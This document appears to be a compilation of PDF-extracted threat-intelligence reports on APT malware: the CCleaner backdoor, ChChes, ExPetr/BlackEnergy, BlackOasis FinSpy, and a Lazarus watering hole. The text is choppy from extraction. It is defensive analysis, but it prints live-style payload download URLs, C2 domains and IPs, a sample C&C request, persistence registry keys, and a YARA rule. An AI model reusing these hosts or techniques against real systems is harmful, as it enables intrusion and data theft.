Binary in screenshot:
f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a
Related APT17 samples:
07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d
0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2
20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27
ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550
2/17
Not only did the first payload have shared code between the Axiom group and CCBkdr, but the second did as well.
The above photo shows the same function between two binaries. Let me put this into better context for you: out of all
the billions and billions of pieces of code (both trusted and malicious) contained in the Intezer Code Genome
Database, we found this code in only these APTs . It is also worth noting that this isn
t a standard method one would
use to call an API. The attacker used the simple technique of employing an array to hide a string from being in clear
sight of those analyzing the binary (although to those who are more experienced, it is obvious) and remain
undetected from antivirus signatures. The author probably copied and pasted the code, which is what often happens
to avoid duplicative efforts: rewriting the same code for the same functionality twice.
Due to the uniqueness of the shared code, we strongly concluded that the code was written by the same attacker.
3/17
Technical Analysis:
The stage two payload that was analyzed in this report
(dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83), after launching the infected version
of CCleaner, was dropped to only a selective group of targets, as reported by Talos. Although there is an x64
version, the following analysis will only include the x86 version because they are nearly identical. I will not be going
too far in depth as full comprehension of the technical analysis will require an understanding of reverse engineering.
Instead of using the typical API (VirtualAlloc) to allocate memory, the attackers allocated memory on the heap using
LocalAlloc, and then copied a compressed payload to the allocated memory.
4/17
It looks like the attackers used version 1.1.4 of zlib to decompress the payload into this allocated memory region.
5/17
Depending on if you
re running x86 or x64 Windows, it will drop a different module. (32-bit
07fb252d2e853a9b1b32f30ede411f2efbb9f01e4a7782db5eacf3f55cf34902, 64-bit
128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f) Both modules are actually legitimate
software with additional code and a modified execution flow.
6/17
The last modified time on the modules is changed to match that of the msvcrt.dll that is located in your system32
folder
a technique to stay under the radar by not being able to check last modified files.
7/17
Some shellcode and another module are written to the registry.
8/17
9/17
After the module is successfully dropped, a service is created under the name Spooler or SessionEnv, depending
upon your environment, which then loads the newly dropped module.
The new module being run by the service allocates memory, reads the registry where the other payload is located,
and then copies it to memory.
10/17
11/17
The next payload is executed, which decrypts another module and loads it. If we look at the memory of the next
decrypted payload, we can see something that looks like a PE header without the MZ signature. From here, it is as
simple as modifying the first two bytes to represent MZ and we have a valid PE file.
(f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a)
12/17
The next module is a essentially another backdoor that connects to a few domains; before revealing the true IP, it
will connect to for the next stage payload.
13/17
It starts by ensuring it receives the correct response from https://www.microsoft.com and
https://update.microsoft.com.
14/17
The malware proceeds to decrypt two more URLs.
The malware authors used steganography to store the IP address in a ptoken field of the HTML.
Here you can see the GitHub page with the ptoken field.
15/17
The value is then XOR decrypted by 0x31415926 which gives you 0x5A093B0D or the IP address: 13.59.9.90
Conclusion:
The complexity and quality of this particular attack has led our team to conclude that it was most likely statesponsored. Considering this new evidence, the malware can be attributed to the Axiom group due to both the nature
of the attack itself and the specific code reuse throughout that our technology was able to uncover.
IOCs:
Stage 2 Payload: dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83
x86 Trojanized Binary: 07fb252d2e853a9b1b32f30ede411f2efbb9f01e4a7782db5eacf3f55cf34902
x86 Registry Payload: f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a
x64 Trojanized Binary: 128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f
16/17
x64 Registry Payload: 75eaa1889dbc93f11544cf3e40e3b9342b81b1678af5d83026496ee6a1b2ef79
Registry Keys:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\001
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\002
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\003
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\004
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WbemPerf\HBP
About Intezer:
Through its
DNA mapping
approach to code, Intezer provides enterprises with unparalleled threat detection that
accelerates incident response and eliminates false positives, while protecting against fileless malware, APTs, code
tampering and vulnerable software.
Curious to learn what
s next for Intezer? Join us on our journey toward achieving these endeavors here on the blog
or request a community free edition invite
By Jay Rosenberg
Jay Rosenberg is a self-taught reverse engineer from a very young age (12 years old), specializing in
Reverse Engineering and Malware Analysis. Currently working as a Senior Security Researcher in
Intezer.
17/17
ChChes
Malware that Communicates with C&C Servers Using
Cookie Headers
blog.jpcert.or.jp/2017/02/chches-malware--93d6.html
Since around October 2016, JPCERT/CC has been confirming emails that are sent to Japanese organisations with
a ZIP file attachment containing executable files. The targeted emails, which impersonate existing persons, are sent
from free email address services available in Japan. Also, the executable files
icons are disguised as Word
documents. When the recipient executes the file, the machine is infected with malware called ChChes.
This blog article will introduce characteristics of ChChes, including its communication.
ZIP files attached to Targeted Emails
While some ZIP files attached to the targeted emails in this campaign contain executable files only, in some cases
they also contain dummy Word documents. Below is the example of the latter case.
Figure 1: Example of an attached ZIP file
In the above example, two files with similar names are listed: a dummy Word document and an executable file
whose icon is disguised as a Word document. By running this executable file, the machine will be infected with
ChChes. JPCERT/CC has confirmed the executable files that have signatures of a specific code signing certificate.
The dummy Word document is harmless, and its contents are existing online articles related to the file name
Donald Trump won
. The details of the code signing certificate is described in Appendix A.
Communication of ChChes
ChChes is a type of malware that communicates with specific sites using HTTP to receive commands and modules.
There are only few functions that ChChes can execute by itself. This means it expands its functions by receiving
modules from C&C servers and loading them on the memory.
The following is an example of HTTP GET request that ChChes sends. Sometimes, HEAD method is used instead
of GET.
GET /X4iBJjp/MtD1xyoJMQ.htm HTTP/1.1
Cookie: uHa5=kXFGd3JqQHMfnMbi9mFZAJHCGja0ZLs%3D;KQ=yt%2Fe(omitted)
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: [user agent]
Host: [host name]
Connection: Keep-Alive
Cache-Control: no-cache
As you can see, the path for HTTP request takes /[random string].htm, however, the value for the Cookie field is not
random but encrypted strings corresponding to actual data used in the communication with C&C servers. The value
can be decrypted using the below Python script.
data_list = cookie_data.split(';')
dec = []
for i in range(len(data_list)):
tmp = data_list[i]
pos = tmp.find("=")
key = tmp[0:pos]
val = tmp[pos:]
md5 = hashlib.md5()
md5.update(key)
rc4key = md5.hexdigest()[8:24]
rc4 = ARC4.new(rc4key)
dec.append(rc4.decrypt(val.decode("base64"))[len(key):])
print("[*] decoded: " + "".join(dec))
The following is the flow of communication after the machine is infected.
Figure 2: Flow of communication
The First Request
The value in the Cookie field of the HTTP request that ChChes first sends (Request 1) contains encrypted data
starting with
. The following is an example of data sent.
Figure 3: Example of the first data sent
As indicated in Figure 3, the data which is sent contains information including computer name. The format of the
encrypted data differs depending on ChChes
s version. The details are specified in Appendix B.
As a response to Request 1, ChChes receives strings of an ID identifying the infected machine from C&C servers
(Response 1). The ID is contained in the Set-Cookie field as shown below.
Figure 4: Example response to the first request
Request for Modules and Commands
Next, ChChes sends an HTTP request to receive modules and commands (Request 2). At this point, the following
data starting with
is encrypted and contained in the Cookie field.
B[ID to identify the infected machine]
As a response to Request 2, encrypted modules and commands (Response 2) are sent from C&C servers. The
following shows an example of received modules and commands after decryption.
Figure 5: Decrypted data of modules and commands received
Commands are sent either together with modules as a single data (as above), or by itself. Afterwards, execution
results of the received command are sent to C&C servers, and it returns to the process to receive modules and
commands. This way, by repeatedly receiving commands from C&C servers, the infected machines will be
controlled remotely.
JPCERT/CC
s research has confirmed modules with the following functions, which are thought to be the bot function
of ChChes.
Encrypt communication using AES
Execute shell commands
Upload files
Download files
Load and run DLLs
View tasks of bot commands
Especially, it was confirmed that the module that encrypts the communication with AES is received in a relatively
early stage after the infection. With this feature, communication with C&C servers after this point will be encrypted in
AES on top of the existing encryption method.
Summary
ChChes is a relatively new kind of malware which has been seen since around October 2016. As this may be
continually used for targeted attacks, JPCERT/CC will keep an eye on ChChes and attack activities using the
malware.
The hash values of the samples demonstrated here are described in Appendix C. The malware
s destination hosts
that JPCERT/CC has confirmed are listed in Appendix D. We recommend that you check if your machines are
communicating with such hosts.
Thanks for reading.
- Yu Nakamura
(Translated by Yukako Uchida)
Appendix A: Code signing certificate
The code signing certificate attached to some samples are the following:
$ openssl x509 -inform der -text -in mal.cer
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
3f:fc:eb:a8:3f:e0:0f:ef:97:f6:3c:d9:2e:77:eb:b9
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use
at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA
Validity
Not Before: Aug 5 00:00:00 2011 GMT
Not After : Aug 4 23:59:59 2012 GMT
Subject: C=IT, ST=Italy, L=Milan, O=HT Srl, OU=Digital ID Class 3 Microsoft Software Validation v2, CN=HT Srl
Subject Public Key Info:
(Omitted)
Figure 6: Code signing certificate
Appendix B: ChChes version
The graph below shows the relation between the version numbers of the ChChes samples that JPCERT/CC has
confirmed and the compile times obtained from their PE headers.
Figure 7: Compile time for each ChChes version
The lists below describe encrypted data contained in the first HTTP request and explanation of the values for each
ChChes version.
Table 1: Sending format of each
version
Version
Format
1.0.0
A*?3618468394??*
1.2.2
A*?3618468394??*
1.3.0
A*?3618468394??*
1.3.2
A*?3618468394??*
1.4.0
A*?3618468394??*
1.4.1
A*?3618468394?? ()*
1.6.4
A**?3618468394?? ()*
Table 2: Description of to
Letter
Data
Size
Details
Computer name
Variable
Capital alphanumeric characters
Process ID
Variable
Capital alphanumeric characters
Path of a temp folder
Variable
%TEMP% value
Letter
Data
Size
Details
Malware version
Variable
e.g. 1.4.1
Screen resolution
Variable
e.g. 1024x768
explorer.exe version
Variable
e.g. 6.1.7601.17567
kernel32.dll version
Variable
e.g. 6.1.7601.17514
Part of MD5 value of SID
16 bytes
e.g. 0345cb0454ab14d7
Appendix C: SHA-256 Hash value of the samples
ChChes
5961861d2b9f50d05055814e6bfd1c6291b30719f8a4d02d4cf80c2e87753fa1
ae6b45a92384f6e43672e617c53a44225e2944d66c1ffb074694526386074145
2c71eb5c781daa43047fa6e3d85d51a061aa1dfa41feb338e0d4139a6dfd6910
19aa5019f3c00211182b2a80dd9675721dac7cfb31d174436d3b8ec9f97d898b
316e89d866d5c710530c2103f183d86c31e9a90d55e2ebc2dda94f112f3bdb6d
efa0b414a831cbf724d1c67808b7483dec22a981ae670947793d114048f88057
e90064884190b14a6621c18d1f9719a37b9e5f98506e28ff0636438e3282098b
9a6692690c03ec33c758cb5648be1ed886ff039e6b72f1c43b23fbd9c342ce8c
bc2f07066c624663b0a6f71cb965009d4d9b480213de51809cdc454ca55f1a91
e6ecb146f469d243945ad8a5451ba1129c5b190f7d50c64580dbad4b8246f88e
e88f5bf4be37e0dc90ba1a06a2d47faaeea9047fec07c17c2a76f9f7ab98acf0
d26dae0d8e5c23ec35e8b9cf126cded45b8096fc07560ad1c06585357921eeed
2965c1b6ab9d1601752cb4aa26d64a444b0a535b1a190a70d5ce935be3f91699
312dc69dd6ea16842d6e58cd7fd98ba4d28eefeb4fd4c4d198fac4eee76f93c3
4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297
45d804f35266b26bf63e3d616715fc593931e33aa07feba5ad6875609692efa2
cb0c8681a407a76f8c0fd2512197aafad8120aa62e5c871c29d1fd2a102bc628
75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f
471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856
ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86
646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543
3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03
9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d
723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48
f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b
Appendix D: List of communication destination
area.wthelpdesk.com
dick.ccfchrist.com
kawasaki.cloud-maste.com
kawasaki.unhamj.com
sakai.unhamj.com
scorpion.poulsenv.com
trout.belowto.com
zebra.wthelpdesk.com
hamiltion.catholicmmb.com
gavin.ccfchrist.com
A gut feeling of old acquaintances, new tools, and a
common battleground
securelist.com /from-blackenergy-to-expetr/78937/
By GReAT
Much has been written about the recent ExPetr/NotPetya/Nyetya/Petya outbreak
you can read our findings
here:Schroedinger
s Pet(ya) and ExPetr is a wiper, not ransomware.
As in the case of Wannacry, attribution is very difficult and finding links with previously known malware is
challenging. In the case of Wannacry, Google
s Neel Mehta was able to identify a code fragment which became the
most important clue in the story, and was later confirmed by further evidence, showing Wannacry as a pet project of
the Lazarus group.
To date, nobody has been able to find any significant code sharing between ExPetr/Petya and older malware. Given
our love for unsolved mysteries, we jumped right on it.
Analyzing the Similarities
At the beginning of the ExPetr outbreak, one of our team members pointed to the fact that the specific list of
extensions used by ExPetr is very similar to the one used by BlackEnergy
s KillDisk ransomware from 2015 and
2016 (Anton Cherepanov from ESET made the same observation on Twitter).
The BlackEnergy APT is a sophisticated threat actor that is known to have used at least one zero day, coupled with
destructive tools, and code geared towards attacking ICS systems. They are widely confirmed as the entity behind
the Ukraine power grid attack from 2015 as well as a chain of other destructive attacks that plagued that country
over the past years.
If you are interested in reading more about the BlackEnergy APT, be sure to check our previous blogs on the topic:
Going back to the hunt for similarities, here
s how the targeted extensions lists looks in ExPetr and a version of a
wiper used by the BE APT group in 2015:
ExPetr
2015 BlackEnergy wiper sample
3ds, .7z, .accdb, .ai, .asp, .aspx,
.avhd, .back, .bak, .c, .cfg, .conf,
.cpp, .cs, .ctl, .dbf, .disk, .djvu, .doc,
.docx, .dwg, .eml, .fdb, .gz, .h, .hdd,
.kdbx, .mail, .mdb, .msg, .nrg, .ora,
.ost, .ova, .ovf, .pdf, .php, .pmf, .ppt,
.pptx, .pst, .pvi, .py, .pyc, .rar, .rtf,
.sln, .sql, .tar, .vbox, .vbs, .vcb, .vdi,
.vfd, .vmc, .vmdk, .vmsd, .vmx,
.vsdx, .vsv, .work, .xls
.3ds, .7z, .accdb, .accdc, .ai, .asp, .aspx, .avhd, .back, .bak, .bin, .bkf, .cer,
.cfg, .conf, .crl, .crt, .csr, .csv, .dat, .db3, .db4, .dbc, .dbf, .dbx, .djvu, .doc,
.docx, .dr, .dwg, .dxf, .edb, .eml, .fdb, .gdb, .git, .gz, .hdd, .ib, .ibz, .io, .jar,
.jpeg, .jpg, .jrs, .js, .kdbx, .key, .mail, .max, .mdb, .mdbx, .mdf, .mkv, .mlk,
.mp3, .msi, .my, .myd, .nsn, .oda, .ost, .ovf, .p7b, .p7c, .p7r, .pd, .pdf,
.pem, .pfx, .php, .pio, .piz, .png, .ppt, .pptx, .ps, .ps1, .pst, .pvi, .pvk, .py,
.pyc, .rar, .rb, .rtf, .sdb, .sdf, .sh, .sl3, .spc, .sql, .sqlite, .sqlite3, .tar, .tiff,
.vbk, .vbm, .vbox, .vcb, .vdi, .vfd, .vhd, .vhdx, .vmc, .vmdk, .vmem, .vmfx,
.vmsd, .vmx, .vmxf, .vsd, .vsdx, .vsv, .wav, .wdb, .xls, .xlsx, .xvd, .zip
Obviously, the lists are similar in composition and formatting, but not identical. Moreover, older versions of the BE
destructive module have even longer lists. Here
s a snippet of an extensions list from a 2015 BE sample that is even
longer:
Nevertheless, the lists were similar in the sense of being stored in the same dot-separated formats. Although this
indicated a possible link, we wondered if we could find more similarities, especially in the code of older variants of
BlackEnergy and ExPetr.
We continued to chase that hunch during the frenetic early analysis phase and shared this gut feeling of a similarity
between ExPetr and BlackEnergy with our friends at Palo Alto Networks. Together, we tried to build a list of features
that we could use to make a YARA rule to detect both ExPetr and BlackEnergy wipers.
During the analysis, we focused on the similar extensions list and the code responsible for parsing the file system for
encryption or wiping. Here
s the code responsible for checking the extensions to target in the current version of
ExPetr:
This works by going through the target file system in a recursive way, then checking if the extension for each file is
included in the dot-separated list. Unfortunately for our theory, the way this is implemented in older BlackEnergy
variants is quite different; the code is more generic and the list of extensions to target is initialized at the beginning,
and passed down to the recursive disk listing function.
Instead, we took the results of automated code comparisons and paired them down to a signature that perfectly fit
the mould of both in the hope of unearthing similarities. What we came up with is a combination of generic code and
interesting strings that we put together into a cohesive rule to single out both BlackEnergy KillDisk components and
ExPetr samples. The main example of this generic code is the inlined wcscmp function merged by the compiler
optimization, meant to check if the filename is the current folder, which is named
. Of course, this code is pretty
generic and can appear in other programs that recursively list files. It
s inclusion alongside a similar extension list
makes it of particular interest to us
but remains a low confidence indicator.
Looking further, we identified some other candidate strings which, although not unique, when combined together
allow us to fingerprint the binaries from our case in a more precise way. These include:
exe /r /f
ComSpec
InitiateSystemShutdown
When put together with the wcscmp inlined code that checks on the filename, we get the following YARA rule:
rule blackenergy_and_petya_similarities {
strings:
//shutdown.exe /r /f
$bytes00 = { 73 00 68 00 75 00 74 00 64 00 6f 00 77 00 6e 00 2e 00 65 00 78 00 65 00 }
//ComSpec
$bytes01 = { 43 00 6f 00 6d 00 53 00 70 00 65 00 63 00 }
//InitiateSystemShutdown
$bytes02 = { 49 6e 69 74 69 61 74 65 53 79 73 74 65 6d 53 68 75 74 64 6f 77 6e 45 78 57}
//68A4430110
push
0100143A4 ;
ntdll.dll
//FF151CD10010
call
GetModuleHandleA
//3BC7
//7420
$bytes03 = { 68 ?? ?? ?1 ?0 ff 15 ?? ?? ?? ?0 3b c7 74 ?? }
eax,edi
$bytes04 = { 2f 00 63 00 }
//wcscmp(
$hex_string = { b9 ?? ?? ?1 ?0 8d 44 24 ?c 66 8b 10 66 3b 11 75 1e 66
85 d2 74 15 66 8b 50 02 66 3b 51 02 75 0f 83 c0 04 83 c1 04 66 85 d2 75
de 33 c0 eb 05 1b c0 83 d8 ff 85 c0 0f 84 ?? 0? 00 00 b9 ?? ?? ?1 ?0 8d
44 24 ?c 66 8b 10 66 3b 11 75 1e 66 85 d2 74 15 66 8b 50 02 66 3b 51 02
75 0f 83 c0 04 83 c1 04 66 85 d2 75 de 33 c0 eb 05 1b c0 83 d8 ff 85 c0
0f 84 ?? 0? 00 00 }
condition:
((uint16(0) == 0x5A4D)) and (filesize < 5000000) and
(all of them)
When run on our extensive (read: very big) malware collection, the YARA rule above fires on BlackEnergy and
ExPetr samples only. Unsurprisingly, when used alone, each string can generate false positives or catch other
unrelated malware. However, when combined together in this fashion, they become very precise . The
technique of grouping generic or popular strings together into unique combinations is one of the most effective
methods for writing powerful Yara rules.
Of course, this should not be considered a sign of a definitive link, but it does point to certain code design
similarities between these malware families.
This low confidence but persistent hunch is what motivates us to ask other researchers around the world to join
us in investigating these similarities and attempt to discover more facts about the origin of ExPetr/Petya.
Looking back at other high profile cases, such as the Bangladesh Bank Heist or Wannacry, there were few facts
linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to link them
together with high confidence. Further research can be crucial to connecting the dots, or, disproving these theories.
d like to think of this ongoing research as an opportunity for an open invitation to the larger security community
to help nail down (or disprove) the link between BlackEnergy and ExPetr/Petya. Our colleagues at ESET have
published their own excellent analysis suggesting a possible link between ExPetr/Petya and TeleBots
(BlackEnergy). Be sure to check out their analysis. And as mentioned before, a special thanks to our friends at Palo
Alto for their contributions on clustering BlackEnergy samples.
Hashes
ExPetr:
027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80
5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6
F52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95
368d5c536832b843c6de2513baf7b11bcafea1647c65df7b6f2648840fa50f75
A6a167e214acd34b4084237ba7f6476d2e999849281aa5b1b3f92138c7d91c7a
Edbc90c217eebabb7a9b618163716f430098202e904ddc16ce9db994c6509310
F9f3374d89baf1878854f1700c8d5a2e5cf40de36071d97c6b9ff6b55d837fca
BlackOasis APT and new targeted attacks leveraging zeroday exploit
securelist.com /blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
By GReAT
More information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service.
Contact: intelreports@kaspersky.com
Introduction
Kaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we
immediately inform the vendor in a responsible manner and provide all the details required for a fix.
On October 10, 2017, Kaspersky Lab
s advanced exploit prevention systems identified a new Adobe Flash zero day
exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and
the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it
CVE-2017-11292 and released a patch earlier today:
So far only one attack has been observed in our customer base, leading us to believe the number of attacks are
minimal and highly targeted.
Analysis of the payload allowed us to confidently link this attack to an actor we track as
BlackOasis
. We are also
highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by
FireEye in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same
command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.
BlackOasis Background
We first became aware of BlackOasis
activities in May 2016, while investigating another Adobe Flash zero day. On
May 10, 2016, Adobe warned of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier
versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.
Kaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner
system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and
1/10
install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the
same server was hosting multiple FinSpy installation packages.
Leveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis
in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were
patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation
packages.
Since the discovery of BlackOasis
exploitation network, we
ve been tracking this threat actor with the purpose of
better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure
documents used in these attacks are shown below:
2/10
Decoy documents used in BlackOasis attacks
To summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:
CVE-2015-5119
June 2015
CVE-2016-0984
June 2015
CVE-2016-4117
May 2016
CVE-2017-8759
Sept 2017
CVE-2017-11292
Oct 2017
Attacks Leveraging CVE-2017-11292
The attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within
3/10
the document is an ActiveX object which contains the Flash exploit.
Flash object in the .docx file, stored in uncompressed format
The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen
in other FinSpy exploits.
4/10
Unpacking routine for SWF exploit
The exploit is a memory corruption vulnerability that exists in the
com.adobe.tvsdk.mediacore.BufferControlParameters
class. If the exploit is successful, it will gain arbitrary
read / write operations within memory, thus allowing it to execute a second stage shellcode.
The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely
designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:
NOP sled composed of 0x90 and 0x91 opcodes
The main purpose of the initial shellcode is to download second stage shellcode from
hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.
5/10
Second stage shellcode
The second stage shellcode will then perform the following actions:
1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe
2. Download a lure document to display to the victim from the same IP
3. Execute the payload and display the lure document
Payload
mo.exe
As mentioned earlier, the
mo.exe
payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of
Gamma International
s FinSpy malware, typically sold to nation states and other law enforcement agencies to use in
lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the
malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute
code.
6/10
The PCODE of the virtual machine is packed with the aplib packer.
Part of packed VM PCODE
After unpacking, the PCODE it will look like the following:
Unpacked PCODE
After unpacking the virtual machine PCODE is then decrypted:
7/10
Decrypted VM PCODE
The custom virtual machine supports a total of 34 instructions:
Example of parsed PCODE
In this example, the
instruction is responsible for executing native code that is specified in parameter field.
Once the payload is successfully executed, it will proceed to copy files to the following locations:
C:\ProgramData\ManagerApp\AdapterTroubleshooter.exe
C:\ProgramData\ManagerApp\15b937.cab
C:\ProgramData\ManagerApp\install.cab
C:\ProgramData\ManagerApp\msvcr90.dll
C:\ProgramData\ManagerApp\d3d9.dll
The
AdapterTroubleshooter.exe
file is a legitimate binary which is leveraged to use the famous DLL search order
hijacking technique. The
d3d9.dll
file is malicious and is loaded into memory by the legit binary upon execution.
Once loaded, the DLL will then inject FinSpy into the Winlogon process.
8/10
Part of injected code in winlogon process
The payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them
used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely
to the BlackOasis APT cluster of FinSpy activity.
Targeting and Victims
BlackOasis
interests span a wide gamut of figures involved in Middle Eastern politics and verticals
disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers
and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified
by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is
also an interest in international activists and think tanks.
Victims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya,
Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.
Conclusions
We estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is
now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools.
Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it
was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the
pace.
We believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones
described here will continue to grow.
What does it mean for everyone and how to defend against such attacks, including zero-day exploits?
For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to
disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash
objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other
necessary resources that rely on Flash and of course, it will not protect against exploits for other third party
software.
Deploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can
help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as
well against this threat by one of the following detections:
The information provided below appeared in the public domain.
Preliminary investigation suggests that the starting point for the infection could have been located on
the webserver of a Polish financial sector regulatory body, Polish Financial Supervision Authority
(www.knf.gov[.]pl). Due to a slight modification of one of the local JS files, an external JS file was loaded,
which could have executed malicious payloads on selected targets.
Note: image is a courtesy of badcyber.com
unauthorised
code
located
following
http://www.knf.gov[.]pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
and looked like this:
document.write("
");
After successful exploitation, malware was downloaded to the workstation, where, once executed, it
connected to some foreign servers and could be used to perform network reconnaissance, lateral
movement and data exfiltration.
Visiting the exploit page resulted in Microsoft Internet Explorer crashing, which was recorded
with a process dump file. The dumped process included the following indicators:
[version="2"]
[swfURL="https://sap.misapor[.]ch/vishop/include/cambio.swf"
pageURL="https://sap.misapor[.]ch/vishop/view.jsp"]...
Additional research by Kaspersky Lab discovered that the exploit file at
hxxp://sap.misapor[.]ch:443/vishop/include/cambio.swf resulted in the download of a
backdoor module.
Based on our own telemetry, Kaspersky Lab confirms that sap.misapor[.]ch was compromised
as well, and was spreading exploits for Adobe Flash Player and Microsoft Silverlight. Some of
the known vulnerability CVEs observed in attacks originate from that website:
CVE-2016-4117
CVE-2015-8651
CVE-2016-1019
CVE-2016-0034
The Flash exploit used in the attacks was very similar to known exploits from the Magnitude
Exploit Kit. These vulnerabilities have been patched by Adobe and Microsoft since April 2016
and January 2016 respectively.
Fig. Part of the exploit code
Inside the exploits, one can see a lot of Russian word strings, like
chainik
BabaLena
vyzov_chainika
podgotovkaskotiny
, etc. The shellcode downloads the final payload from:
https://sap[.]misapor.ch/vishop/view.jsp?uid=[redacted]&pagenum=3&eid=00000002&s=2
&data=
It's worth mentioning here that Lazarus used other false flags in conjunction with this Russian
exploit code. They also used some Russian words in one of the backdoors and packed the
malware with a commercial protector (Enigma) developed by a Russian author. However, the
Russian words in the backdoor looked like a very cheap imitation, because every native
Russian speaking software developer quickly noticed how odd these commands were.
Fig. Russian words in the backdoor code.
At the time of research this URL was dead but we were able to find an identical one which leads
to a malicious file download (MD5: 06cd99f0f9f152655469156059a8ea25, detected as TrojanBanker.Win32.Alreay.gen) from http://www.eye-watch[.]in/design/img/perfmon.dat.
Interestingly, this sample was uploaded to VirusTotal from Poland and Korea in November
2016. It is a packed version of a previously known backdoor used by Lazarus attackers in
Incident #1
s bank.
What Made the Breach Possible
Since the attackers didn
t use any zero-days, the infiltration was successful because of nonupdated software. In one case, we observed a victim running the following software:
The exploit breached the system running Adobe Flash Player, version 20.0.0.235. This version
was officially released on 8 December, 2015.
Adobe implemented a self-update mechanism for Flash Player some years ago and the
analyzed system indeed had a scheduled job, which attempted to periodically update Adobe
Flash Updater. We checked the event logs of the Task Scheduler and this task was regularly
running.
The task was started as SYSTEM user and attempted to connect to the Internet to fetch Flash
Player updates from fpdownload.macromedia.com. However, this attempt failed, either
because it couldn't find the proxy server to connect to the update server, or because of missing
credentials for the proxy. The last failed attempt to update Adobe Flash was dated in December
2016, a month before the breach happened. If only that updater could have accessed the
Internet the attack would have failed. This is an important issue that may be widely present in
many corporate networks.
Lateral Movement. Backup Server.
